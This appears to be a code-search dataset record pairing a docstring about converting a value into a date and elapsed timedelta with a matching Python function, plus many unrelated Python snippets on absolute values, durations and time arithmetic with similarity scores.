datetime.timedelta(seconds=offset)\n\n return absolute_datetime", "def __abs__(self):\n return Quantity(abs(self._value), self.unit)", "def create_timedelta():\n # timedelta(days, seconds, microseconds, milliseconds, minutes, hours, weeks)\n td = datetime.timedelta(microseconds=-1)\n # Why is this (-1, 86399, 999999)?\n # Because -1 days + (86,400 - 1) seconds = -1 second, and -1,000,000 microseconds + 999,999 microseconds = -1 microsecond\n print(td.days, td.seconds, td.microseconds) # (-1, 86399, 999999)", "def __abs__(self):\n retval = self.copy()\n retval._val = abs(retval._val)\n return retval", "def abs(self):\n\n return self._get(\"abs\", rtype=self.__class__)", "def eta(self):\n eta = self.fields['eta']\n if eta >= 0:\n return datetime.timedelta(seconds=eta)\n else:\n ValueError('eta not valid')", "def _convert_to_timedelta(time_diff):\n return timedelta(seconds=time_diff)", "def absolute_value(val):\n if val < 0:\n return val * -1\n else:\n return val", "def as_duration(abs_time_in_seconds):\n\n durations = (\n ('s', 1),\n ('m', 60),\n ('h', 60 * 60),\n ('d', 60 * 60 * 24),\n ('w', 60 * 60 * 24 * 7)\n )\n\n duration = time.time() - abs_time_in_seconds\n result = \"now\"\n\n for label, length in durations:\n if length > duration:\n break\n result = \"{:.0f}{}\".format(math.ceil(duration / length), label)\n\n return result", "def day_relative_to_absolute(relative):\n today = datetime.datetime.today()\n delta = datetime.timedelta(days=relative)\n return (today - delta).strftime(\"%Y-%m-%d\")", "def duration(self):\n # type: () -> Optional[timedelta]\n\n if self.datetime_start and self.datetime_complete:\n return self.datetime_complete - self.datetime_start\n else:\n return None", "def find_absolute_value(x):\n return math.fabs(x)", "def abs(self):\n\n return Number.abs(self)", "def _abs (x):\n\n return x if le(nil,x) else -x", "def _convert_to_timedelta(time_diff):\n return timedelta(microseconds=time_diff / _NANO_TO_MICRO)", "def abs(self):\n return self * self.sign()", "def timedelta(self, *a, **kw):\n from datetime import timedelta\n return timedelta(*a, **kw)", "def resolve(self):\n addl_micros = round(self.nanoseconds / 1000)\n return self.td + datetime.timedelta(microseconds=addl_micros)", "def absulute2relative_time(x): \n if x.viewed:\n x.viewed_reltime=x.viewed_time-x.start\n \n if x.completed:\n x.completed_reltime=x.completed_time-x.start\n \n return x", "def absolute_value(val):\n a = np.round(val/100.*np.array(cum_hours).sum(), 0)\n return a", "def get_duration(self):\n return (self.stop_day - self.start_day) * (24 * 60) \\\n + (self.stop_hour - self.start_hour) * 60", "def abs(x):\n pass", "def dst (self, dt):\n return self.__ZeroDuration", "def get_abs_dist(self, pos1, pos2):\n\t\treturn min(abs(pos1 - pos2), abs(pos1 - pos2 + 360))", "def absIP(self):\n np.fabs(self.t, out=self.t)\n return self", "def __abs__( self ):\r\n\t\tif ( self < 0 ): return -self\r\n\t\telse: return self", "def abs(data):\n return _make.abs(data)", "def __abs__ (self) :\n return self.__class__ (abs (self.radians))", "def relative_datetime(self):\n now = datetime.now(timezone.utc)\n created_at = self.created_at.astimezone(timezone.utc)\n\n delta = humanize.naturaldelta(abs(created_at - now))\n tense = \"from now\" if now < created_at else \"ago\"\n\n return f\"{delta} {tense}\"", "def to_timedelta(value) -> timedelta:\n\n # For values >=24hrs, Pandas converts them to a datetime object.\n # For values <24hrs, Pandas converts them to time object.\n if isinstance(value, timedelta):\n return value\n elif isinstance(value, datetime):\n return value - datetime(1900, 1, 1) + timedelta(hours=24)\n elif isinstance(value, time):\n return datetime.combine(date.min, value) - datetime.min\n elif isinstance(value, str):\n duration_regex = re.compile(\n r\"^(?P<sign>-?)(?P<hours>[0-9]+?):(?P<minutes>[0-9]{2})$\"\n )\n parts = duration_regex.match(value.strip())\n if parts is not None:\n sign = parts.group(\"sign\")\n hours = float(parts.group(\"hours\"))\n minutes = float(parts.group(\"minutes\"))\n if sign == \"-\":\n hours = hours * (-1)\n minutes = minutes * (-1)\n return timedelta(hours=hours, minutes=minutes)\n else:\n logging.warning(\n \"Could not convert overtime value to timedelta \"\n \"object. \"\n f\"Values was {value} and type was {type(value)}.\"\n )\n\n else:\n logging.warning(\n \"Could not convert overtime value to timedelta object. \"\n f\"Value was {value} and type was {type(value)}.\"\n )\n\n return timedelta(0)", "def distance(self):\n return Distance(length_of(self.position.au))", "def magabs(self):\n if not self.has_target():\n raise AttributeError(\"No target defined, I can't get the distance\")\n return self.mag - 5*( np.log10(self.target.distmpc*1.e6) - 1)", "def calc_time(self, distance):\r\n if distance < 400:\r\n return 2*math.sqrt(distance / 1406.25)\r\n else:\r\n distance -= 400\r\n return distance / 750 + 16 / 15", "def __abs__(self):\n\t\tval = abs(self.val)\n\t\tif 0 in self.val:\n\t\t\traise ValueError(\"Absolute value is not differentiable at 0.\")\n\n\t\tder_copy = np.copy(self.der)\n\t\tif len(der_copy.shape):\n\t\t\tfor i, val_i in enumerate(self.val):\n\t\t\t\tif val_i < 0:\n\t\t\t\t\tder_copy[i] = -1 * der_copy[i]\n\t\treturn Var(val, der_copy)", "def abs__inplace(a):", "def get_time_delta(n):\n return datetime.timedelta(days=n)", "def testAbsDist():\n units = unitsystem.UnitSystem()\n assert units.absorption_distance(25000, 3) == 0.13377926628219666\n assert units.absorption_distance(25000, 2) == 0.07525083728373562\n assert units.absorption_distance(25000, 3) / units.absorption_distance(12500, 3) == 2.", "def scalar_abs(self, dst, src):\n return self._scalar_single_func('abs', dst, src)", "def duration(self):\r\n return self.t2 - self.t1", "def absolute_value(x):\n x_star = x.clone()\n x_star[1] *= -1\n return elementwise_mult(x, x_star)[0].sqrt_()", "def duration(self):\n delta = self.occurrence.end - self.occurrence.start\n real_hours = delta.days * 24 + delta.seconds / (60.0 * 60.0)\n\n adjusted_hours = attendance_settings.HOUR_MULTIPLIER * real_hours\n\n return adjusted_hours", "def timeToOffset(self, abstractTime, timescale='seconds'):\n return datetime.timedelta(**{timescale: abstractTime})", "def test_abs():\n \n assert (abs(Quantity(-1, unit('m'))) ==\n abs(Quantity(1, unit('m'))) ==\n Quantity(1, unit('m')))", "def handle(self, value, context: typing.MutableMapping):\n if isinstance(value, timedelta):\n return value\n elif isinstance(value, int):\n return timedelta(milliseconds=int(value * self.resolution))\n try:\n return timedelta(\n milliseconds=int(Decimal(value) * self.resolution))\n except (ValueError, InvalidOperation):\n pass\n\n match = self.duration_re.match(value)\n if not match:\n self.report(value, context)\n return None\n\n params = {\n key: int(value)\n for key, value in match.groupdict().items()\n if value\n }\n return timedelta(**params)", "def time_diff(dt1, dt2):\n return abs(int((dt2 - dt1).total_seconds()))", "def _subtract_times(self, a, b):\n td = a - b\n return td.days * 24 * 60 + td.seconds // 60", "def duration(self):\n return self.end_abs - self.start", "def get_abs_tolerance(self):\n\n if Test.global_abs_tolerance is None:\n return self._abs_tolerance\n return Test.global_abs_tolerance", "def __timedelta_millis(td):\n return int(round(td.total_seconds(), 3) * 1000)", "def absolute(x):\n return -x if x < 0 else x", "def abs_(arg):\n ...", "def __abs__ (self) :\n return self.__class__ (abs (self.degrees))", "def __abs__(self):\n out = self.copy()\n out.addFunction(Query.Function.Abs)\n return out", "def end_abs(self):\n if self.end == float('inf'):\n return self.track.duration\n else:\n return self.end", "def time_to_point(distance):\n if distance <= (125 / 9) ** 2:\n return distance ** .5\n return distance * 9 / 250 + 125 / 18", "def get_Delta (self, t):\n\n if t < self.t_dress_begin or t > self.t_undress_end:\n Delta = self.Delta_max\n dDelta_dt = 0\n\n elif t < self.t_dress_end:\n t_zeroed = t - self.t_dress_begin\n Delta = self.Delta_max \\\n + (self.Delta_min - self.Delta_max) / (self.t_dress_end - self.t_dress_begin) * t_zeroed\n dDelta_dt = (self.Delta_min - self.Delta_max) / (self.t_dress_end - self.t_dress_begin)\n\n elif t > self.t_undress_begin:\n t_zeroed = t - self.t_undress_begin\n Delta = self.Delta_min \\\n + (self.Delta_max - self.Delta_min) / (self.t_undress_end - self.t_undress_begin) * t_zeroed\n dDelta_dt = (self.Delta_max - self.Delta_min) / (self.t_undress_end - self.t_undress_begin)\n else:\n Delta = self.Delta_min\n dDelta_dt = 0\n\n return Delta, dDelta_dt", "def parse_timedelta(value: Optional[str]):\n if not value:\n return None\n unit = value[-1]\n amount = int(value[0:-1])\n if unit == \"h\":\n return timedelta(hours=amount)\n elif unit == \"m\":\n return timedelta(minutes=amount)\n elif unit == \"d\":\n return timedelta(days=amount)\n else:\n raise ValueError(f\"Invalid time unit: {value}\")", "def timedelta_to_duration(obj: \"timedelta\") -> \"Duration\":\n d = Duration()\n d.seconds = int(obj.total_seconds())\n d.nanos = obj.microseconds * 1000\n return d", "def realtime_to_ingame_delta(sec: float) -> timedelta:\n return timedelta(days=SECONDS_TO_DAYS * sec)", "def _normalizeDeltaTime(self, dt : float) -> float:\n return dt / self.tau", "def __abs__(self):\n return abs(self._fsm.get(self._id))", "def absolute_distance(cls, q0, q1):\n q0_minus_q1 = q0 - q1\n q0_plus_q1 = q0 + q1\n d_minus = q0_minus_q1.norm\n d_plus = q0_plus_q1.norm\n if (d_minus < d_plus):\n return d_minus\n else:\n return d_plus", "def _adjusted_time(self, otime: float = 0):\n if 'xtime_adjustment' in self.__timing_parameters:\n return time.time() - self.__timing_parameters['xtime_adjustment'] - otime\n else:\n return time.time() - otime", "def absolute_magnitude(self):\n return self._absolute_magnitude", "def timestep(self) -> Optional[float]:\n dt = None\n if len(self.time) > 1 and self.is_equidistant:\n dt = (self.time[1] - self.time[0]).total_seconds() # type: ignore\n return dt", "def __sub__(self, other):\n if not isinstance(other, real_datetime):\n if isinstance(other, real_timedelta):\n return self + -other\n return NotImplemented\n\n days1 = self.toordinal()\n days2 = other.toordinal()\n secs1 = self._second + self._minute * 60 + self._hour * 3600\n secs2 = other.second + other.minute * 60 + other.hour * 3600\n base = timedelta(\n days1 - days2, secs1 - secs2, self._microsecond - other.microsecond\n )\n if self._tzinfo is other.tzinfo:\n return base\n myoff = self.utcoffset()\n otoff = other.utcoffset()\n if myoff == otoff:\n return base\n if myoff is None or otoff is None:\n raise TypeError(\"cannot mix naive and timezone-aware time\")\n return base + otoff - myoff", "def duration(self):\r\n return (self.end_time or time.time()) - self.start_time", "def abs(f):\n return f.per(dmp_abs(f.rep, f.lev, f.dom))", "def __abs__(self):\r\n raise TypeError(f\"bad operand type for abs(): '{type(self).__name__}'\")", "def timedeltaToFloat(self,time_d):\n time_d_min = time_d / timedelta(minutes=1)\n time_d_s = time_d / timedelta(seconds=1)\n time_d_ms = time_d / timedelta(milliseconds=1)\n\n return (time_d_min * 60 + time_d_s + time_d_ms * 0.001)", "def abs(self):\n return math.sqrt(self['real'] * self['real'] + self['imaginary'] * self['imaginary'])", "def alarm_length():\n start = datetime.time(hour=alarm_start_hour, minute=alarm_start_minute)\n stop = datetime.time(hour=alarm_stop_hour, minute=alarm_stop_minute)\n\n delta = datetime.timedelta(hours=stop.hour - start.hour, minutes=stop.minute - start.minute)\n\n return delta.seconds", "def __abs__(self):\n abspos = abs(self.pos)\n absvel = abs(self.vel)\n return np.amax((abspos, absvel))", "def GetAbsBeer(epsilon, conc, pathLength):\n return epsilon * conc * pathLength", "def _normalizeTime(self, t : float) -> float:\n return (t - self.t0)/self.tau", "def absolute_offset(self, offset):\n return self._offset + offset", "def date_and_delta(value):\n now = datetime.datetime.now()\n if isinstance(value, datetime.datetime):\n date = value\n delta = now - value\n elif isinstance(value, datetime.timedelta):\n date = now - value\n delta = value\n else:\n try:\n value = int(value)\n delta = datetime.timedelta(seconds=value)\n date = now - delta\n except (ValueError, TypeError):\n return None, value\n return date, abs_timedelta(delta)", "def GetAbsoluteDay(self):\n if not self.Complete():\n raise DateTimeError(\"absolute day requires complete date\")\n absYear = self.century * 100 + self.year - 1\n return (absYear // 4) - (absYear // 100) + (absYear // 400) + \\\n (absYear * 365) + self.GetOrdinalDay()[2]", "def __abs__(self):\n return type(self)(abs(self.number))", "def abs(n):\n if n > 0:\n return n\n else:\n return -n", "def difference_from_time_instance(self, time: __class__):\n\n return self - time", "def get_time_diff(start_time, end_time):\n time_diff = end_time - start_time\n return timedelta(seconds=int(round(time_diff)))", "def duration(self) -> datetime.timedelta:\n return self._duration", "def distance_from(self, other) -> int:\n assert isinstance(other, CustomDate), \"You must pass a valid CustomDate object\"\n return (self.minutes() - other.minutes()) + (self - other) * 24 * 60", "def get_time_with_delta(string):\n\n # If it looks like an ISO time, return that.\n try:\n absolute = pscheduler.iso8601_as_datetime(string)\n # Default behavior is to localize naive times.\n if absolute.tzinfo is None:\n absolute = pytz.utc.localize(absolute)\n return pscheduler.datetime_as_iso8601(absolute)\n except ValueError:\n pass\n\n try:\n if string[0:1] == \"+P\":\n delta = pscheduler.iso8601_as_timedelta(string[1:])\n elif string[0:1] == \"-P\":\n delta = -1 * pscheduler.iso8601_as_timedelta(string[1:])\n else:\n pass\n except ValueError:\n pscheduler.fail(\"Invalid time delta '%s'\" % (string))\n\n # Let this throw what it's going to throw.\n delta = pscheduler.iso8601_as_timedelta(string)\n\n return pscheduler.datetime_as_iso8601(\n pscheduler.time_now() + delta)", "def time_to_next_ageout(self) -> Optional[float]:\n if not len(self):\n return None\n\n insertion_time_earliest = min(map(lambda t: t[1], self.values()))\n age_out_time = insertion_time_earliest + self._lifetime\n delta = age_out_time - time.monotonic()\n\n return delta", "def negative(a: Decimal) -> Decimal:\n return -a", "def duration(self):\n return float('{0:.2f}'.format(self.end_time - self.start_time))", "def manhatam_distance(self) -> int:\n return abs(self.position[0]) + abs(self.position[1])", "def __abs__(self):\n return self.magnitude()", "def get_duration(self):\n return float(self.time.iloc[-1] - self.time.iloc[0])" ]
[ "0.75997627", "0.6525403", "0.64160365", "0.6255736", "0.58985287", "0.58082616", "0.57936674", "0.573392", "0.569296", "0.56611925", "0.56431794", "0.56412184", "0.56401443", "0.5639377", "0.5544877", "0.5541361", "0.5524112", "0.5501755", "0.547358", "0.54723006", "0.54522437", "0.54519135", "0.5440847", "0.5408365", "0.54063404", "0.5403135", "0.5398996", "0.5394417", "0.53897077", "0.5384018", "0.53831774", "0.5378582", "0.53667927", "0.5328425", "0.532611", "0.5317814", "0.5307131", "0.52998984", "0.5288602", "0.5287825", "0.5287481", "0.5277267", "0.5270742", "0.52347296", "0.5233617", "0.5231283", "0.5213888", "0.5198821", "0.5196889", "0.5179608", "0.5174761", "0.51743364", "0.5164766", "0.5157884", "0.51539665", "0.5138161", "0.51311207", "0.51303244", "0.5122739", "0.5121538", "0.51146746", "0.5114599", "0.5104098", "0.5095512", "0.5086197", "0.5079575", "0.50759906", "0.5041165", "0.50399464", "0.5039128", "0.50386125", "0.50334334", "0.5033426", "0.50032115", "0.49957794", "0.49946892", "0.49923167", "0.49917036", "0.4978129", "0.49718395", "0.49688545", "0.49671537", "0.4964641", "0.49618676", "0.4959226", "0.49559158", "0.49550366", "0.49458984", "0.4933127", "0.49302006", "0.4911928", "0.49100322", "0.4908613", "0.4891059", "0.48879814", "0.48876595", "0.48825765", "0.48821938", "0.48684633", "0.48679525" ]
0.7604547
0
Turn a value into a date and a timedelta which represents how long ago it was. If that's not possible, return (None, value).
def date_and_delta(value): now = datetime.datetime.now() if isinstance(value, datetime.datetime): date = value delta = now - value elif isinstance(value, datetime.timedelta): date = now - value delta = value else: try: value = int(value) delta = datetime.timedelta(seconds=value) date = now - delta except (ValueError, TypeError): return None, value return date, abs_timedelta(delta)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def date_and_delta(value):\r\n now = _now()\r\n if isinstance(value, datetime):\r\n date = value\r\n delta = now - value\r\n elif isinstance(value, timedelta):\r\n date = now - value\r\n delta = value\r\n else:\r\n try:\r\n value = int(value)\r\n delta = timedelta(seconds=value)\r\n date = now - delta\r\n except (ValueError, TypeError):\r\n return (None, value)\r\n return date, abs_timedelta(delta)", "def naturaltime(value):\n try:\n value = datetime.datetime(value.year, value.month, value.day, value.hour, value.minute, value.second)\n except AttributeError:\n return value\n except ValueError:\n return value\n\n if getattr(value, 'tzinfo', None):\n now = datetime.datetime.now(LocalTimezone(value))\n else:\n now = datetime.datetime.now()\n now = now - timedelta(0, 0, now.microsecond)\n if value < now:\n delta = now - value\n if delta.days != 0:\n return pgettext(\n 'naturaltime', '%(delta)s ago'\n ) % {'delta': defaultfilters.timesince(value)}\n elif delta.seconds == 0:\n return _(u'now')\n elif delta.seconds < 60:\n return ungettext(\n u'a second ago', u'%(count)s seconds ago', delta.seconds\n ) % {'count': delta.seconds}\n elif delta.seconds // 60 < 60:\n count = delta.seconds // 60\n return ungettext(\n u'a minute ago', u'%(count)s minutes ago', count\n ) % {'count': count}\n else:\n count = delta.seconds // 60 // 60\n return ungettext(\n u'an hour ago', u'%(count)s hours ago', count\n ) % {'count': count}\n else:\n delta = value - now\n if delta.days != 0:\n return pgettext(\n 'naturaltime', '%(delta)s from now'\n ) % {'delta': defaultfilters.timeuntil(value)}\n elif delta.seconds == 0:\n return _(u'now')\n elif delta.seconds < 60:\n return ungettext(\n u'a second from now', u'%(count)s seconds from now', delta.seconds\n ) % {'count': delta.seconds}\n elif delta.seconds // 60 < 60:\n count = delta.seconds // 60\n return ungettext(\n u'a minute from now', u'%(count)s minutes from now', count\n ) % {'count': count}\n else:\n count = delta.seconds // 60 // 60\n return ungettext(\n u'an hour from now', u'%(count)s hours from now', count\n ) % {'count': count}", "def _get_delta(self, now, then):\n if now.__class__ is not then.__class__:\n now = datetime.date(now.year, now.month, now.day)\n then = datetime.date(then.year, then.month, then.day)\n if now < then:\n raise ValueError(\"Cannot determine moderation rules because date field is set to a value in the future\")\n return now - then", "def naturaltime(value, future=False, months=True):\r\n now = _now()\r\n date, delta = date_and_delta(value)\r\n if date is None:\r\n return value\r\n # determine tense by value only if datetime/timedelta were passed\r\n if isinstance(value, (datetime, timedelta)):\r\n future = date > now\r\n\r\n ago = _('%s from now') if future else _('%s ago')\r\n delta = naturaldelta(delta)\r\n\r\n if delta == _(\"a moment\"):\r\n return _(\"now\")\r\n\r\n return ago % delta", "def make_datetime(value):\n if value:\n return value\n return None", "def ago(self):\n return human(self.timestamp/1000.0, precision=1, abbreviate=True)", "def _parse_date(value):\n # Check for day-month pattern\n day_month_text = re.match(\"^(\\d{1,2})-(\\d{2})$\", value)\n if day_month_text:\n day = int(day_month_text.group(1))\n month = int(day_month_text.group(2))\n return datetime(datetime.now().year, month, day)\n\n # I assume Polish locale\n parts = value.strip().split(maxsplit=1)\n amount = int(parts[0])\n for hour_part in TIMEDELTA_HOURS:\n if hour_part in parts[1]:\n delta = timedelta(hours=amount)\n break\n else:\n for minute_part in TIMEDELTA_MINS:\n if minute_part in parts[1]:\n delta = timedelta(minutes=amount)\n break\n return datetime.now() - delta", "def SAgeDdt(ddt):\n if ddt.days < 0:\n return \"in the future?\"\n months = int(ddt.days*12/365)\n years = int(ddt.days/365)\n if years >= 1:\n return \"%d year%s ago\" % (years, SPlural(years))\n if months >= 3:\n return \"%d months ago\" % months \n if ddt.days == 1:\n return \"yesterday\"\n if ddt.days > 1:\n return \"%d days ago\" % ddt.days\n hrs = int(ddt.seconds/60/60)\n if hrs >= 1:\n return \"%d hour%s ago\" % (hrs, SPlural(hrs))\n minutes = round(ddt.seconds/60)\n if minutes < 1:\n return \"seconds ago\"\n return \"%d minute%s ago\" % (minutes, SPlural(minutes))", "def relativeTime(date):\n diff = datetime.utcnow() - date\n\n if diff.days > 7 or diff.days < 0:\n return date.ctime()\n elif diff.days == 1:\n return '1 day ago'\n elif diff.days > 1:\n return '%d days ago' % diff.days\n elif diff.seconds <= 1:\n return 'just now'\n elif diff.seconds < 60:\n return '%d seconds ago' % diff.seconds\n elif diff.seconds < (60 * 2):\n return '1 minute ago'\n elif diff.seconds < (60 * 60):\n return '%d minutes ago' % (diff.seconds / 60)\n elif diff.seconds < (60 * 60 * 2):\n return '1 hour ago'\n else:\n return '%d hours ago' % (diff.seconds / (60 * 60))", "def time_since(dt, default=\"just now\"):\n\t\n\tnow = datetime.utcnow()\n\tdiff = now - dt\n\t\n\tperiods = (\n\t\t(diff.days / 365, \"year\", \"years\"),\n\t\t(diff.days / 30, \"month\", \"months\"),\n\t\t(diff.days / 7, \"week\", \"weeks\"),\n\t\t(diff.days, \"day\", \"days\"),\n\t\t(diff.seconds / 3600, \"hour\", \"hours\"),\n\t\t(diff.seconds / 60, \"minute\", \"minutes\"),\n\t\t(diff.seconds, \"second\", \"seconds\"),\n\t)\n\n\tfor period, singular, plural in periods:\n\t\tif period:\n\t\t\treturn \"%d %s ago\" % (period, singular if period == 1 else plural)\n\n\treturn default", "async def _parse_value(self, responses: SourceResponses) -> Value:\n commit_responses = responses[1:]\n return str(days_ago(max([parse((await response.json())[\"committed_date\"]) for response in commit_responses])))", "def timesince(dt, default=\"just now\"):\n\n now = datetime.datetime.now()\n diff = now - dt\n \n periods = (\n (diff.days / 365, \"year\", \"years\"),\n (diff.days / 30, \"month\", \"months\"),\n (diff.days / 7, \"week\", \"weeks\"),\n (diff.days, \"day\", \"days\"),\n (diff.seconds / 3600, \"hour\", \"hours\"),\n (diff.seconds / 60, \"minute\", \"minutes\"),\n (diff.seconds, \"second\", \"seconds\"),\n )\n\n for period, singular, plural in periods:\n \n if period:\n return \"%d %s ago\" % (period, singular if period == 1 else plural)\n\n return default", "def howLongAgo(time=False):\n now = timezone.now()\n if type(time) is int:\n diff = now - datetime.fromtimestamp(time)\n elif isinstance(time,datetime):\n diff = now - time\n elif not time:\n diff = now - now\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n return ''\n\n if day_diff == 0:\n if second_diff < 10:\n return \"genau jetzt\"\n if second_diff < 60:\n return \"vor \" + str(second_diff) + \" Sek.\"\n if second_diff < 120:\n return \"vor einer Min.\"\n if second_diff < 3600:\n return \"vor \" + str( second_diff / 60 ) + \" Min.\"\n if second_diff < 7200:\n return \"vor einer St.\"\n if second_diff < 86400:\n return \"vor \" + str( second_diff / 3600 ) + \" St.\"\n if day_diff == 1:\n return \"Gestern\"\n if day_diff < 7:\n return \"vor \" + str(day_diff) + \" Tagen\"\n if day_diff < 31:\n return \"vor \" + str(day_diff/7) + \" Wochen\"\n if day_diff < 365:\n return \"vor \" + str(day_diff/30) + \" Monaten\"\n return \"vor \" + str(day_diff/365) + \" Jahren\"", "def shorttimesince(value, arg=None):\r\n from django.utils.timesince import timesince\r\n if not value:\r\n return u''\r\n if arg:\r\n return calculate_shorttimesince(arg, value)\r\n return calculate_shorttimesince(value)", "def pretty_date(time=False):\n now = datetime.datetime.utcnow()\n if type(time) is int:\n diff = now - datetime.datetime.fromtimestamp(time)\n elif isinstance(time, datetime.datetime):\n diff = now - time\n elif not time:\n diff = now - now\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n day_diff *= -1\n second_diff *= -1\n if day_diff < 1:\n if second_diff < 10:\n return ugettext('imminently')\n if second_diff < 60:\n return ungettext('{n} second from now', '{n} seconds from now', second_diff).format(n=second_diff)\n if second_diff < 120:\n return ugettext('in a minute')\n if second_diff < 3600:\n return ungettext('{n} minute from now', '{n} minutes from now', second_diff / 60).format(n=second_diff / 60)\n if second_diff < 7200:\n return ugettext('in an hour')\n if second_diff < 86400:\n return ungettext('{n} hour from now', '{n} hours from now', second_diff / 3600).format(n=second_diff / 3600)\n if day_diff == 1:\n return ugettext('tomorrow')\n if day_diff < 7:\n return ungettext('{n} day from now', '{n} days from now', day_diff).format(n=day_diff)\n if day_diff < 31:\n return ungettext('{n} week from now', '{n} weeks from now', day_diff / 7).format(n=day_diff / 7)\n if day_diff < 365:\n return ungettext('{n} month from now', '{n} months from now', day_diff / 30).format(n=day_diff / 30)\n return ungettext('{n} year from now', '{n} years from now', day_diff / 365).format(n=day_diff / 365)\n\n if day_diff == 0:\n if second_diff < 10:\n return ugettext('just now')\n if second_diff < 60:\n return ungettext('{n} second ago', '{n} seconds ago', second_diff).format(n=second_diff)\n if second_diff < 120:\n return ugettext('a minute ago')\n if second_diff < 3600:\n return ungettext('{n} minute ago', '{n} minutes ago', second_diff / 60).format(n=second_diff / 60)\n if second_diff < 7200:\n return ugettext('an hour ago')\n if second_diff < 86400:\n return ungettext('{n} hour ago', '{n} hours ago', second_diff / 3600).format(n=second_diff / 3600)\n if day_diff == 1:\n return ugettext('yesterday')\n if day_diff < 7:\n return ungettext('{n} day ago', '{n} days ago', day_diff).format(n=day_diff)\n if day_diff < 31:\n return ungettext('{n} week ago', '{n} weeks ago', day_diff / 7).format(n=day_diff / 7)\n if day_diff < 365:\n return ungettext('{n} month ago', '{n} months ago', day_diff / 30).format(n=day_diff / 30)\n return ungettext('{n} year ago', '{n} years ago', day_diff / 365).format(n=day_diff / 365)", "def abs_timedelta(delta):\n if delta.days < 0:\n now = datetime.datetime.now()\n return now - (now + delta)\n return delta", "def naturaltime(value):\n if not isinstance(value, date): # datetime is a subclass of date\n return value\n\n now = datetime.now(utc if is_aware(value) else None)\n if value < now:\n delta = now - value\n if delta.days != 0:\n return 'hace %(delta)s' % {'delta': defaultfilters.timesince(value)}\n elif delta.seconds == 0:\n return 'ahora'\n elif delta.seconds < 60:\n return u'hace %(count)s segundos' % {'count': delta.seconds}\n elif delta.seconds // 60 < 60:\n count = delta.seconds // 60\n return u'hace %(count)s minutos' % {'count': count}\n else:\n count = delta.seconds // 60 // 60\n return u'hace %(count)s horas' % {'count': count}", "def abs_timedelta(delta):\r\n if delta.days < 0:\r\n now = _now()\r\n return now - (now + delta)\r\n return delta", "def pretty_date(time=False):\n now = datetime.now()\n if type(time) is int:\n diff = now - datetime.fromtimestamp(time)\n elif isinstance(time, datetime):\n diff = now - time\n elif not time:\n diff = now - now\n else:\n diff = now - now\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n return ''\n\n if day_diff == 0:\n if second_diff < 10:\n return \"just now\"\n if second_diff < 60:\n return str(int(round(second_diff, 0))) + \" seconds ago\"\n if second_diff < 120:\n return \"a minute ago\"\n if second_diff < 3600:\n return str(int(round(second_diff / 60, 0))) + \" minutes ago\"\n if second_diff < 7200:\n return \"an hour ago\"\n if second_diff < 86400:\n return str(int(round(second_diff / 3600, 0))) + \" hours ago\"\n if day_diff == 1:\n return \"Yesterday\"\n if day_diff < 7:\n return str(int(round(day_diff, 0))) + \" days ago\"\n if day_diff < 31:\n return str(int(round(day_diff / 7, 0))) + \" weeks ago\"\n if day_diff < 365:\n return str(int(round(day_diff / 30, 0))) + \" months ago\"\n return str(int(round(day_diff / 365, 0))) + \" years ago\"", "def pretty_date(time=False):\r\n from datetime import datetime\r\n import dateutil.parser\r\n now = datetime.now()\r\n if type(time) is str or type(time) is unicode:\r\n time = dateutil.parser.parse(time)\r\n if type(time) is int:\r\n diff = now - datetime.fromtimestamp(time)\r\n elif isinstance(time, datetime):\r\n diff = now - time\r\n elif not time:\r\n diff = now - now\r\n second_diff = diff.seconds\r\n day_diff = diff.days\r\n\r\n if day_diff < 0:\r\n return ''\r\n\r\n if day_diff == 0:\r\n if second_diff < 10:\r\n return \"just now\"\r\n if second_diff < 60:\r\n return str(second_diff) + \" seconds ago\"\r\n if second_diff < 120:\r\n return \"a minute ago\"\r\n if second_diff < 3600:\r\n return ' '.join([str(second_diff / 60), \"minutes ago\"])\r\n if second_diff < 7200:\r\n return \"an hour ago\"\r\n if second_diff < 86400:\r\n return ' '.join([str(second_diff / 3600), \"hours ago\"])\r\n if day_diff == 1:\r\n return \"Yesterday\"\r\n if day_diff < 7:\r\n return ' '.join([str(day_diff), \"days ago\"])\r\n if day_diff < 31:\r\n return ' '.join([str(day_diff / 7), \"weeks ago\"])\r\n if day_diff < 60:\r\n return ' '.join([str(day_diff / 30), \"month ago\"])\r\n if day_diff < 365:\r\n return ' '.join([str(day_diff / 30), \"months ago\"])\r\n if day_diff < (365 * 2):\r\n return ' '.join([str(day_diff / 365), \"year ago\"])\r\n return ' '.join([str(day_diff / 365), \"years ago\"])", "def handle(self, value, context: typing.MutableMapping):\n if isinstance(value, timedelta):\n return value\n elif isinstance(value, int):\n return timedelta(milliseconds=int(value * self.resolution))\n try:\n return timedelta(\n milliseconds=int(Decimal(value) * self.resolution))\n except (ValueError, InvalidOperation):\n pass\n\n match = self.duration_re.match(value)\n if not match:\n self.report(value, context)\n return None\n\n params = {\n key: int(value)\n for key, value in match.groupdict().items()\n if value\n }\n return timedelta(**params)", "def timedelta_filter(date_value, **kwargs):\n\n current_date = parse_datetime(date_value)\n return (current_date - timedelta(**kwargs))", "def get_entry_date(input):\n if input and \"date\" in input.keys():\n return input[\"date\"], input[\"date\"] + timedelta(minutes=1)\n return None, None", "def to_timedelta(value) -> timedelta:\n\n # For values >=24hrs, Pandas converts them to a datetime object.\n # For values <24hrs, Pandas converts them to time object.\n if isinstance(value, timedelta):\n return value\n elif isinstance(value, datetime):\n return value - datetime(1900, 1, 1) + timedelta(hours=24)\n elif isinstance(value, time):\n return datetime.combine(date.min, value) - datetime.min\n elif isinstance(value, str):\n duration_regex = re.compile(\n r\"^(?P<sign>-?)(?P<hours>[0-9]+?):(?P<minutes>[0-9]{2})$\"\n )\n parts = duration_regex.match(value.strip())\n if parts is not None:\n sign = parts.group(\"sign\")\n hours = float(parts.group(\"hours\"))\n minutes = float(parts.group(\"minutes\"))\n if sign == \"-\":\n hours = hours * (-1)\n minutes = minutes * (-1)\n return timedelta(hours=hours, minutes=minutes)\n else:\n logging.warning(\n \"Could not convert overtime value to timedelta \"\n \"object. \"\n f\"Values was {value} and type was {type(value)}.\"\n )\n\n else:\n logging.warning(\n \"Could not convert overtime value to timedelta object. \"\n f\"Value was {value} and type was {type(value)}.\"\n )\n\n return timedelta(0)", "def _subtract_times(self, a, b):\n td = a - b\n return td.days * 24 * 60 + td.seconds // 60", "def relative_datetime(self):\n now = datetime.now(timezone.utc)\n created_at = 